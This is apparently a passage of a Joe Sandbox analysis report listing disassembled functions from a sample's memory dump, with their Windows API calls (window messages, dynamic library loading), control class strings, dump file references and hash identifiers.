                                                                                                                              • Opcode ID: a0dc50e3077df676a20a9f40fdab46f3f9e7c518929a56b2f5f560104dc3dbb4
                                                                                                                              • Instruction ID: 5ba62c2013f2c99d9ad632a4d82f494d6acd730324d0324de999a535b048d70a
                                                                                                                              • Opcode Fuzzy Hash: a0dc50e3077df676a20a9f40fdab46f3f9e7c518929a56b2f5f560104dc3dbb4
                                                                                                                              • Instruction Fuzzy Hash: 8531B031200205AFDF119F38DC45BEA7BA9EF49328F244726F975932E1D770E9619B90
                                                                                                                              Function 001DA698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001DA74F
                                                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001DA75D
                                                                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001DA764
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                                                              • String ID: msctls_updown32
                                                                                                                              • API String ID: 4014797782-2298589950
                                                                                                                              • Opcode ID: 3162a068b3833d77be848d9fb66afefcc6f6cb2509dd86772d14d691ed9cd724
                                                                                                                              • Instruction ID: 64ef9b32fe556a4de80b042303b4dd381d4a650430e3fe41db9f8311717f8af4
                                                                                                                              • Opcode Fuzzy Hash: 3162a068b3833d77be848d9fb66afefcc6f6cb2509dd86772d14d691ed9cd724
                                                                                                                              • Instruction Fuzzy Hash: A32151B5600205AFEB10DF64DCC5EBB37ADEF5A394B54045AFA019B351C771EC11CAA1
                                                                                                                              Function 001D97B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001D983D
                                                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001D984D
                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 001D9872
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$MoveWindow
                                                                                                                              • String ID: Listbox
                                                                                                                              • API String ID: 3315199576-2633736733
                                                                                                                              • Opcode ID: 1c2209fbfe1614c59fb7e8477936daaef6ef884b6256ebc7bf7438c49c9b5f73
                                                                                                                              • Instruction ID: a4d46c05ec9ea6820df62e9ae029f2d8937ec6f017d60d6d055a6dde7308d65c
                                                                                                                              • Opcode Fuzzy Hash: 1c2209fbfe1614c59fb7e8477936daaef6ef884b6256ebc7bf7438c49c9b5f73
                                                                                                                              • Instruction Fuzzy Hash: F821C632610118BFEF119F54DC85FBB3BAAEF8AB64F118125F9059B290C7719C51DBA0
                                                                                                                              Function 001DA217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001DA27B
                                                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001DA290
                                                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 001DA29D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID: msctls_trackbar32
                                                                                                                              • API String ID: 3850602802-1010561917
                                                                                                                              • Opcode ID: 0f907097dc55cb3ed3bf5fc97773f21e477f73278dd768b6b0800694fe5f54ee
                                                                                                                              • Instruction ID: 3cd414c8c8fb7e07ab9f53214da1e3b6a429da8fa683e5b75be6343749d61cca
                                                                                                                              • Opcode Fuzzy Hash: 0f907097dc55cb3ed3bf5fc97773f21e477f73278dd768b6b0800694fe5f54ee
                                                                                                                              • Instruction Fuzzy Hash: B6113A71200308BFEF209F61CC46FA73BA8EF88B54F014119FA5196190D372D851CB60
                                                                                                                              Function 00192F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,?,00192F11,00000000), ref: 00192F79
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00192F80
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: RoInitialize$combase.dll
                                                                                                                              • API String ID: 2574300362-340411864
                                                                                                                              • Opcode ID: 75f7fd5dd38e2e525a1f9a0e7475e0150ef40589442fdb2f9032c5d1113d085d
                                                                                                                              • Instruction ID: dc6f5bcfe6ff5c18520caf4ecfe2729154f8e5e878642308e6fbcab86eb22f17
                                                                                                                              • Opcode Fuzzy Hash: 75f7fd5dd38e2e525a1f9a0e7475e0150ef40589442fdb2f9032c5d1113d085d
                                                                                                                              • Instruction Fuzzy Hash: 12E01A70694304ABDF205F71FC9EB353666A700706F000064F246D24A0DBB58050EF19
                                                                                                                              Function 00193034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00192F4E), ref: 0019304E
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00193055
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: RoUninitialize$combase.dll
                                                                                                                              • API String ID: 2574300362-2819208100
                                                                                                                              • Opcode ID: 1419a0aa7544314d35e38110e89d17e7e11c940fe2a4f2591d31152c84ba93f5
                                                                                                                              • Instruction ID: 47d1b12a00f58eb71336e4c46c604a1d1cd310b36e68388b9a7dba47aa82888c
                                                                                                                              • Opcode Fuzzy Hash: 1419a0aa7544314d35e38110e89d17e7e11c940fe2a4f2591d31152c84ba93f5
                                                                                                                              • Instruction Fuzzy Hash: 80E0ECB0744304ABDB315F61FD5DB353A75B700702F140054F24ED24B0CBB54550EB29
                                                                                                                              Function 001EBA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LocalTime__swprintf
                                                                                                                              • String ID: %.3d$WIN_XPe
                                                                                                                              • API String ID: 2070861257-2409531811
                                                                                                                              • Opcode ID: c501eb5055e5d5ca9b9f85540406b11e32c73c30130b5b9cab2e0587982378aa
                                                                                                                              • Instruction ID: 3fef2ac9030151d99e26cefad4397572a8eb264d16afac6112b426a2ca26dcc1
                                                                                                                              • Opcode Fuzzy Hash: c501eb5055e5d5ca9b9f85540406b11e32c73c30130b5b9cab2e0587982378aa
                                                                                                                              • Instruction Fuzzy Hash: 3DE0EC7180C45CFACF1896929D869BF72BCAB48300F5148A2B91692000D7359B54AB21
                                                                                                                              Function 001D20F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,001D20EC,?,001CF751), ref: 001D2104
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 001D2116
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: GetProcessId$kernel32.dll
                                                                                                                              • API String ID: 2574300362-399901964
                                                                                                                              • Opcode ID: b026acef8671d1df709cfa806b650792ae2e046e804c09d94062b658e518d371
                                                                                                                              • Instruction ID: 94a1944dffa6109d42dc3de63112744f2953ee0d392d00ba095986d71f5289f7
                                                                                                                              • Opcode Fuzzy Hash: b026acef8671d1df709cfa806b650792ae2e046e804c09d94062b658e518d371
                                                                                                                              • Instruction Fuzzy Hash: 8ED0A734414322EFD7316FA0F80D62236D4AB14300B10841AE69AD1654D770C4D0CA10
                                                                                                                              Function 0018E6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0018E69C,?,0018E43F), ref: 0018E6B4
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0018E6C6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                              • API String ID: 2574300362-192647395
                                                                                                                              • Opcode ID: d233b10d97576deb17f57fcf93a12929facdf7cae10e05a7a9b48f16b741d79e
                                                                                                                              • Instruction ID: 5a331769fd7e93acbc02b9964e5b50a915f567352fd8d76390c3d0b1dcc70f0a
                                                                                                                              • Opcode Fuzzy Hash: d233b10d97576deb17f57fcf93a12929facdf7cae10e05a7a9b48f16b741d79e
                                                                                                                              • Instruction Fuzzy Hash: 1CD0A934818322EFD7306FB0F80867236E8AB24301F21542AE496E2660EBB0D8E0DB10
                                                                                                                              Function 0018E6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0018E6D9,0000000C,0018E55B,0020DC28,?,?), ref: 0018E6F1
                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0018E703
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                              • API String ID: 2574300362-3024904723
                                                                                                                              • Opcode ID: 42e1237068e74a2143ed2f6bbca7da8466977cff144f20c199181e0fe08d68aa
                                                                                                                              • Instruction ID: 113ec30b20203b1270cd32eb9bca9bf77a8fd395a00608fcaec89a2dc6e7f91f
                                                                                                                              • Opcode Fuzzy Hash: 42e1237068e74a2143ed2f6bbca7da8466977cff144f20c199181e0fe08d68aa
                                                                                                                              • Instruction Fuzzy Hash: 82D05238814322FAD7203BA0B8486233FE8AB05300B01442AE496A2660DBB0D880CB91
                                                                                                                              Function 001CEBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,001CEBAF,?,001CEAAC), ref: 001CEBC7
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 001CEBD9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                              • API String ID: 2574300362-1816364905
                                                                                                                              • Opcode ID: c2fae5d349d262a6f5efbc0eed307bc161922238abad60ca7ecf9e0e2873571e
                                                                                                                              • Instruction ID: d983601b4b4b53704ac81613e5f6034c80e767946f83dde6f14262cbf3e66530
                                                                                                                              • Opcode Fuzzy Hash: c2fae5d349d262a6f5efbc0eed307bc161922238abad60ca7ecf9e0e2873571e
                                                                                                                              • Instruction Fuzzy Hash: 1FD05E34418722ABD7202F70B848B2136D4AB14304B11841DE45692550DB70DC80C610
                                                                                                                              Function 001B137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,?,001B135F,?,001B1440), ref: 001B1389
                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 001B139B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                              • API String ID: 2574300362-1071820185
                                                                                                                              • Opcode ID: d80817fea8e266f33b10bd8267525c4ed6f205947799557e56668be245a97585
                                                                                                                              • Instruction ID: c02a7ec54b5a5949e8809870c2f0712902f96f05e5b3eaa6dc7a64cb706c6907
                                                                                                                              • Opcode Fuzzy Hash: d80817fea8e266f33b10bd8267525c4ed6f205947799557e56668be245a97585
                                                                                                                              • Instruction Fuzzy Hash: 51D0A731C24322BFD7204F64F8087A536D4FF04314F054419E486D1960E7B4C5D0D720
                                                                                                                              Function 001B13A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,001B1371,?,001B1519), ref: 001B13B4
                                                                                                                              • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 001B13C6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                              • API String ID: 2574300362-1587604923
                                                                                                                              • Opcode ID: cd200e7befc835f529ae5ba7692864dd5982a24be35a219e423f268deabf7a8a
                                                                                                                              • Instruction ID: 13eba079aefb3084b04dbfad00ff4a6d1faf703cd1d0b068e457e6c2c897a6ac
                                                                                                                              • Opcode Fuzzy Hash: cd200e7befc835f529ae5ba7692864dd5982a24be35a219e423f268deabf7a8a
                                                                                                                              • Instruction Fuzzy Hash: 5ED0A730414322BFD7204F65F80866136E9BB40314F014419E456D1970EBB4C4C0C710
                                                                                                                              Function 001D3ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,001D3AC2,?,001D29F5), ref: 001D3ADA
                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001D3AEC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                              • API String ID: 2574300362-4033151799
                                                                                                                              • Opcode ID: 6fceea1b098f53834e4b25a031436e393b15bacac269c13b683de84caccbe422
                                                                                                                              • Instruction ID: 744c8e75c00b31561669cefa6b9152c702b8343b5be2f8ea06a55d2297121ac2
                                                                                                                              • Opcode Fuzzy Hash: 6fceea1b098f53834e4b25a031436e393b15bacac269c13b683de84caccbe422
                                                                                                                              • Instruction Fuzzy Hash: AFD0A7315183239FD7205F60F80D66177D8AB12304B00442AF4E6D2A90EFF0C4C0C611
                                                                                                                              Function 0017AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
